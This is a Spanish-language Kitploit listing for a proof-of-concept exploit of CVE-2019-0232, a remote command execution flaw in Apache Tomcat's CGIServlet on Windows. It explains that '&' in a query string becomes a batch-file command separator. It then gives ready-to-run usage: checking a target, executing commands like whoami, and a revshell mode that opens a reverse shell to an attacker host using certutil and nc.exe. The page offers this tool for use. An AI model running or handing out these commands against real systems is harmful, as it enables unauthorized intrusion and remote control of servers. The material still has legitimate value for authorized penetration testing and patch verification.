Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit | Kitploit
Herramientas/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Ver Repositorio
112hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Inyección en scripts batch de Windows mediante argumentos de la cadena de consulta

Descripción

Apache Tomcat con el servlet CGI habilitado y enableCmdLineArguments=true pasa los parámetros de la cadena de consulta como argumentos de línea de comandos a los scripts CGI. En Windows, los archivos batch (.bat/.cmd) interpretan & como separador de comandos, lo que permite la ejecución arbitraria de comandos mediante una URL manipulada.

Requisitos previos

  • Servlet CGI habilitado en conf/web.xml o WEB-INF/web.xml
  • enableCmdLineArguments=true en los init-params del servlet CGI
  • Un script CGI (por ejemplo, ism.bat) desplegado y accesible
  • Objetivo Windows (se requieren archivos batch para la inyección de &)
  • Uso

    root@kitploit:~
    git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
    cd CVE-2019-0232
    pip install -r requirements.txt
    

    Comprobar si existe el endpoint CGI:

    root@kitploit:~
    python cve-2019-0232.py check -t http://target:8080
    python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
    

    Ejecutar un comando:

    root@kitploit:~
    python cve-2019-0232.py exec -t http://target:8080 -c whoami
    python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
    

    Shell inversa (certutil en 2 etapas + nc.exe):

    root@kitploit:~
    python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444
    

    Requisitos

    • Python 3.8+
    • requests
    • Objetivo Windows (la vulnerabilidad es específica del sistema operativo)
    Descargar herramienta